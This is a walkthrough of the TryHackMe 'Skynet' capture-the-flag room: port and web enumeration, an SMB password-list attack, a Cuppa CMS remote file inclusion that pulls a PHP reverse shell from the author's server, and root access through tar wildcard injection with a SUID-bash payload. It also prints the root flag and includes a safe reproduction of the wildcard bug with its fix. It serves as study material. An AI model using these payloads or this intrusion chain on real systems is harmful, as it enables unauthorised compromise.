#tryhackme #linux #easy

![[Pasted image 20250624224650.png]]

---

# Port Scanning - Nmap

As always I began by scanning all TCP ports with Nmap.

```bash
root@ip-10-10-49-42:~# sudo nmap -sS 10.10.180.210 -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:28 BST
Nmap scan report for 10.10.180.210
Host is up (0.00054s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
MAC Address: 02:C4:8A:43:D0:67 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
```

Once the initial scan finished, I ran a second scan with default scripts and version detection (`-sC -sV`), this time only against the ports found.

```bash
root@ip-10-10-49-42:~# nmap -sC -sV $IP -p 22,80,110,139,143,445
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:30 BST
Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210)
Host is up (0.00023s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA SASL TOP RESP-CODES AUTH-RESP-CODE PIPELINING UIDL
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID more have post-login OK LOGINDISABLEDA0001 capabilities ENABLE listed SASL-IR IMAP4rev1 LOGIN-REFERRALS Pre-login LITERAL+ IDLE
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2025-06-24T19:31:10-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-06-25T00:31:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
```

Two things stand out already: the SMB scripts ran under a guest session (`account_used: guest`), so anonymous share enumeration is an obvious next step, and the box runs a mail stack (Dovecot POP3/IMAP) next to the web server.

Finally I scanned the top 1,000 UDP ports.
```bash
root@ip-10-10-49-42:~# nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:32 BST
Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210)
Host is up (0.00027s latency).
Not shown: 993 open|filtered ports
PORT      STATE  SERVICE
137/udp   open   netbios-ns
686/udp   closed hcp-wismar
959/udp   closed unknown
27899/udp closed unknown
36384/udp closed unknown
42313/udp closed unknown
49178/udp closed unknown
MAC Address: 02:C4:8A:43:D0:67 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
```

Only 137/udp (NetBIOS name service) answered. The 993 `open|filtered` ports are inconclusive by nature: no reply to a UDP probe can mean either a silent listener or a firewall, and at `--min-rate 3000` some ICMP unreachables are rate-limited away, so this scan rules little out.

# Footprinting

##### Port 80

![[Pasted image 20250624193618.png]]

```bash
root@ip-10-10-49-42:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.180.210
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 314] [--> http://10.10.180.210/admin/]
/css                  (Status: 301) [Size: 312] [--> http://10.10.180.210/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.10.180.210/js/]
/config               (Status: 301) [Size: 315] [--> http://10.10.180.210/config/]
/ai                   (Status: 301) [Size: 311] [--> http://10.10.180.210/ai/]
/squirrelmail         (Status: 301) [Size: 321] [--> http://10.10.180.210/squirrelmail/]
/server-status        (Status: 403) [Size: 278]
Progress: 218275 / 218276 (100.00%)
===============================================================
Finished
===============================================================
```

![[Pasted image 20250624203459.png]]

##### Port 445

I was able to list shares with `smbclient` without credentials (`-N`). The `anonymous` and `milesdyson` shares stood out to me.

```bash
root@ip-10-10-49-42:~# smbclient -N -L //$IP

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
```

The `anonymous` share contained some files, which I downloaded locally to investigate further.

```bash
root@ip-10-10-49-42:~# smbclient -N //$IP/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 16:04:00 2020
  ..                                  D        0  Tue Sep 17 08:20:17 2019
  attention.txt                       N      163  Wed Sep 18 04:04:59 2019
  logs                                D        0  Wed Sep 18 05:42:16 2019

		9204224 blocks of size 1024. 5831508 blocks available
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 05:42:16 2019
  ..                                  D        0  Thu Nov 26 16:04:00 2020
  log2.txt                            N        0  Wed Sep 18 05:42:13 2019
  log1.txt                            N      471  Wed Sep 18 05:41:59 2019
  log3.txt                            N        0  Wed Sep 18 05:42:16 2019

		9204224 blocks of size 1024. 5831508 blocks available
```

`attention.txt`

```bash
root@ip-10-10-49-42:~# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```

`log1.txt`

```bash
root@ip-10-10-49-42:~# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```

`log2.txt` and `log3.txt` are just empty files.

```bash
root@ip-10-10-49-42:~# cat log2.txt
root@ip-10-10-49-42:~# cat log3.txt
root@ip-10-10-49-42:~# ls -l log2.txt
-rw-r--r-- 1 root root 0 Jun 25 01:38 log2.txt
root@ip-10-10-49-42:~# ls -l log3.txt
-rw-r--r-- 1 root root 0 Jun 25 01:38 log3.txt
```

`log1.txt` looks like a list of passwords, which suggests a password-list attack against the SMB server to find a valid credential. So that is what I did, with crackmapexec.

```bash
root@ip-10-10-49-42:~# crackmapexec smb $IP -u 'skynet.local\miles' -p log1.txt
SMB         10.10.180.210   445    SKYNET           [*] Windows 6.1 (name:SKYNET) (domain:) (signing:False) (SMBv1:True)
SMB         10.10.180.210   445    SKYNET           [+] skynet.local\miles:cyborg007haloterminator
```

One caveat before trusting a hit like this: it is the very first line of `log1.txt`, and the username `miles` is a guess. When Samba is configured with `map to guest = Bad User` (as the stock Ubuntu `smb.conf` is), an unknown username is accepted with any password as a guest session, which crackmapexec still reports as `[+]` (without `(Pwn3d!)`). A quick sanity check is to rerun with a deliberately wrong password; if that also comes back `[+]`, the server is mapping the user to guest rather than validating the password.

I had what looked like a valid credential but still could not access the `milesdyson` SMB share. Then I remembered the `/squirrelmail` path I had discovered earlier with gobuster. What if I tried the credential there? `miles:cyborg007haloterminator` didn't work. I tried his full name as the username and it let me in!

![[Pasted image 20250624203903.png]]

![[Pasted image 20250624203915.png]]

Let's read each email one by one, starting with the first. This is why the password found did not work.

![[Pasted image 20250624204100.png]]

The second email contains nothing but binary data. I'll make sure to convert it to text later.
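For that conversion, here is a small shell helper. It is an added example, not part of the original writeup or of the room, and it uses only POSIX sh and awk so it runs on the attacking box without extra tooling. It turns a message written as 8-bit binary groups back into text, accepting either space-separated bytes or one unbroken run of bits. The sample input is constructed here by encoding the string that the decode step yields on this box, so the helper can be checked offline.

```sh
#!/bin/sh
# Added example (not from the original writeup): decode a message written as
# 8-bit binary groups, like the second SquirrelMail message, from the shell.
# POSIX sh + awk only.

# decode_bits STRING
# Accepts either space-separated bytes ("01001000 01101001") or one unbroken
# run of bits; every 8-bit group is converted to its ASCII character.
decode_bits() {
  printf '%s\n' "$1" | awk '
    function emit(bits,   v, j) {
      v = 0
      for (j = 1; j <= length(bits); j++)
        v = v * 2 + substr(bits, j, 1)        # shift-and-add, MSB first
      printf "%c", v                          # numeric %c prints the byte
    }
    {
      for (i = 1; i <= NF; i++) {
        s = $i
        if (length(s) <= 8) { emit(s); continue }   # one byte per field
        while (length(s) > 0) {                      # unbroken run: chop into bytes
          emit(substr(s, 1, 8))
          s = substr(s, 9)
        }
      }
    }'
}

# Constructed sample: the string the decode step yields on this box,
# re-encoded as binary so the function can be checked offline.
SAMPLE_BITS='00101001 01110011 01111011 01000001 00100110 00110010 01011010 00111101 01000110 01011110 01101110 01011111 01000101 00101110 01000010'

# Usage: run the script directly to decode the sample.
decode_bits "$SAMPLE_BITS"
echo
```

Paste the bits copied from the mail client as the argument to `decode_bits`; line breaks and extra spaces are harmless because awk splits on any whitespace. Non-ASCII bytes come out as raw bytes, which is usually what you want when the result is a password.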
![[Pasted image 20250624204207.png]]

And the last email in the inbox.

![[Pasted image 20250624204457.png]]

I converted the binary data from the second email, and the result closely matches the contents of the last email.

![[Pasted image 20250624204740.png]]

The decoded string is `)s{A&2Z=F^n_E.B`. Used as the new password for `milesdyson`, it opened his personal SMB share.

```bash
root@ip-10-10-49-42:~# smbclient //$IP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 17 10:05:47 2019
  ..                                  D        0  Wed Sep 18 04:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 10:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 10:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 10:05:14 2019
  notes                               D        0  Tue Sep 17 10:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 10:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 10:05:14 2019

		9204224 blocks of size 1024. 5810756 blocks available
smb: \>
```

I downloaded the whole `notes` directory. `prompt OFF` suppresses the per-file confirmation and `recurse ON` makes `mget` descend into subdirectories.

```bash
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget notes
getting file \notes\3.01 Search.md of size 65601 as notes/3.01 Search.md (32030.2 KiloBytes/sec) (average 73885.3 KiloBytes/sec)
getting file \notes\4.01 Agent-Based Models.md of size 5683 as notes/4.01 Agent-Based Models.md (1849.9 KiloBytes/sec) (average 73533.4 KiloBytes/sec)
getting file \notes\2.08 In Practice.md of size 7949 as notes/2.08 In Practice.md (2587.5 KiloBytes/sec) (average 73188.4 KiloBytes/sec)
getting file \notes\0.00 Cover.md of size 3114 as notes/0.00 Cover.md (1520.4 KiloBytes/sec) (average 72956.8 KiloBytes/sec)
getting file \notes\1.02 Linear Algebra.md of size 70314 as notes/1.02 Linear Algebra.md (34331.3 KiloBytes/sec) (average 72832.4 KiloBytes/sec)
```

Then a file named `important.txt` caught my eye.

```bash
root@ip-10-10-49-42:~/notes# cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```

I navigated to `10.10.180.210/45kra24zxs28v3yd` and found the page below.

![[Pasted image 20250624210146.png]]

I ran gobuster against that path and found `/administrator`.

```bash
root@ip-10-10-49-42:~/notes# gobuster dir -u http://$IP/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.180.210/45kra24zxs28v3yd
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/administrator        (Status: 301) [Size: 339] [--> http://10.10.180.210/45kra24zxs28v3yd/administrator/]
Progress: 218275 / 218276 (100.00%)
===============================================================
Finished
===============================================================
root@ip-10-10-49-42:~/notes#
```

`/administrator` revealed the name of the CMS in use: `Cuppa`.

![[Pasted image 20250624211610.png]]

# Exploit

I searched for `cuppa` in searchsploit and there was one known vulnerability for Cuppa CMS.
```bash
root@ip-10-10-50-98:~# searchsploit cuppa
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Rem | php/webapps/25971.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
```

(The attacker and target addresses change from here on, 10.10.50.98 and 10.10.237.190 instead of 10.10.49.42 and 10.10.180.210, because the lab was redeployed between sessions.)

The exploit `25971.txt` describes a file inclusion in `alertConfigField.php`: the `urlConfig` parameter is used unchecked as the name of the file to include, so an attacker can include a local file or, if remote includes are allowed, a remote one, which leads to full server compromise.

```bash
#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream
```

To prepare the attack, I downloaded Pentest Monkey's well-known PHP reverse shell, which I would use to receive the shell.

![[Pasted image 20250624215533.png]]

I hosted the payload with Python's built-in HTTP server and pointed the `urlConfig` parameter from the PoC at it. The target then fetches the file over HTTP and evaluates it as PHP, so as soon as the included code runs, the reverse shell connects back to my listener. Note that remote includes only work when PHP's `allow_url_include` is enabled on the target; if it is not, the local-file variant from the PoC is the fallback.

```bash
root@ip-10-10-50-98:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```bash
root@ip-10-10-50-98:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
```

This is the full URL I requested.

```bash
http://10.10.237.190/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.50.98:8000/php-reverse-shell.php
```

Upon navigating to that URL in the browser, I immediately saw the target fetch my reverse shell from the Python server.

```bash
root@ip-10-10-50-98:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.237.190 - - [25/Jun/2025 04:02:28] "GET /php-reverse-shell.php HTTP/1.0" 200 -
```

Checking the Netcat listener, I had a reverse shell as `www-data`, as expected.

```bash
root@ip-10-10-50-98:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.237.190 47674
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 22:02:27 up 37 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```

Found `user.txt`!

```bash
$ cd milesdyson
$ ls
backups  mail  share  user.txt
$ cat user.txt
7ce5...
```

# Privilege Escalation

`cat /etc/crontab` reveals that `backup.sh` is scheduled to run as root every minute (`*/1 * * * *`).

```bash
www-data@skynet:/home/milesdyson$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
```

Unfortunately we cannot modify the script itself, since it is owned by root and we have no write permission on it.

```bash
www-data@skynet:/home/milesdyson$ ls -l /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh
```

What `backup.sh` does is create a backup archive of the web root every minute: it changes directory to `/var/www/html` and uses `tar` to pack the contents of that directory into an archive. The important detail is the unquoted `*`, which the shell expands into the bare file names in that directory before `tar` ever sees them.

```bash
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```

I was stuck here and was not able to finish the privilege escalation on my own, so what follows is what I gathered from other people's write-ups.

Apparently there is a technique called **Wildcard Injection**, which takes advantage of the wildcard in the `tar` command. GNU `tar` accepts options anywhere on its command line, so a file whose name starts with `--` is parsed as an option rather than as a file to archive. Since `www-data` can create files in `/var/www/html` (the web root we just got a shell in), we can plant file names that `tar` will read as options. To exploit this, we proceed as follows:

1. Create a script that sets the SUID bit on `/bin/bash`.

```bash
echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh
```

2. Create these two files, whose names are `tar` options:
	1. `--checkpoint-action=exec=sh root_shell.sh`
	2. `--checkpoint=1`

```bash
touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh"
touch "/var/www/html/--checkpoint=1"
```

`--checkpoint-action=ACTION` and `--checkpoint=NUMBER` are two options of the `tar` command.

- `--checkpoint=NUMBER` displays progress messages every NUMBERth record.
- `--checkpoint-action=ACTION` executes ACTION on each checkpoint. In our case the action is `exec`.
- `exec=command` executes the specified command (`sh root_shell.sh`) through `/bin/sh`. The relative path resolves because the script has already done `cd /var/www/html`, and the command runs as root because cron runs `backup.sh` as root.

Therefore, the next time the cron job runs, `tar` takes the two files we created as options rather than as ordinary file names, executes `root_shell.sh`, and leaves `/bin/bash` with the SUID (and SGID, since `chmod +s` sets both) bit set. `bash -p` is needed because bash drops an effective UID that differs from the real UID unless started in privileged mode.

Got the `root.txt` flag.

```bash
www-data@skynet:/home/milesdyson/backups$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash
www-data@skynet:/home/milesdyson/backups$ /bin/bash -p
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3f0372db24753accc7179a282cd6a949
```
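To see the mechanism without touching `/bin/bash`, here is a self-contained reproduction of the wildcard injection above next to the one-character fix for `backup.sh`. This is an added example, not code from the writeup or from the room: it rebuilds the layout of `backup.sh` under a `mktemp` directory as an unprivileged user, and the planted `root_shell.sh` only drops a marker file instead of running `chmod +s`. It needs GNU `tar`, since `--checkpoint` is a GNU extension.

```sh
#!/bin/sh
# Added example (not from the original writeup): reproduce the tar wildcard
# injection from the privilege escalation in a throwaway directory and show
# the hardened form of the backup command. Requires GNU tar.

gnu_tar() { tar --version 2>/dev/null | grep -q 'GNU tar'; }

# Stand-in for /var/www/html: one real web file plus the three attacker
# entries (payload script + two option-shaped filenames). The payload only
# creates a marker file, standing in for "chmod +s /bin/bash".
setup_webroot() {
  work=$(mktemp -d)
  mkdir "$work/html" "$work/backups"
  echo '<h1>Skynet</h1>' > "$work/html/index.html"
  printf '#!/bin/sh\ntouch "%s/pwned"\n' "$work" > "$work/html/root_shell.sh"
  touch "$work/html/--checkpoint=1"
  touch "$work/html/--checkpoint-action=exec=sh root_shell.sh"
  echo "$work"
}

# The cron job as backup.sh runs it: the unquoted * is expanded by the shell,
# so tar receives "--checkpoint=1" and the exec action as arguments and runs
# "sh root_shell.sh" relative to the current directory.
backup_vulnerable() {   # $1 = work dir
  ( cd "$1/html" && tar cf "$1/backups/backup.tgz" * ) >/dev/null 2>&1
}

# Hardened form: "./*" makes every expanded name start with "./", so nothing
# the shell passes can be parsed as an option ("--" before "*" also works).
backup_hardened() {     # $1 = work dir
  ( cd "$1/html" && tar cf "$1/backups/backup.tgz" ./* ) >/dev/null 2>&1
}

# Run one backup function and report whether the planted payload executed.
run_check() {           # $1 = work dir, $2 = backup function name
  rm -f "$1/pwned"
  "$2" "$1" || true
  if [ -e "$1/pwned" ]; then echo vulnerable; else echo safe; fi
}

# Demo when run directly: compare both forms on the same directory.
if gnu_tar; then
  w=$(setup_webroot)
  echo "backup.sh as on the box : $(run_check "$w" backup_vulnerable)"
  echo "backup.sh with ./*      : $(run_check "$w" backup_hardened)"
  rm -rf "$w"
else
  echo "GNU tar not found, skipping demo"
fi
```

The first line prints `vulnerable` and the second `safe`. The archive still contains the attacker's files in both cases; the difference is only whether `tar` treats their names as options, which is why the fix belongs in the script's invocation of `tar` rather than in cleaning up the web root.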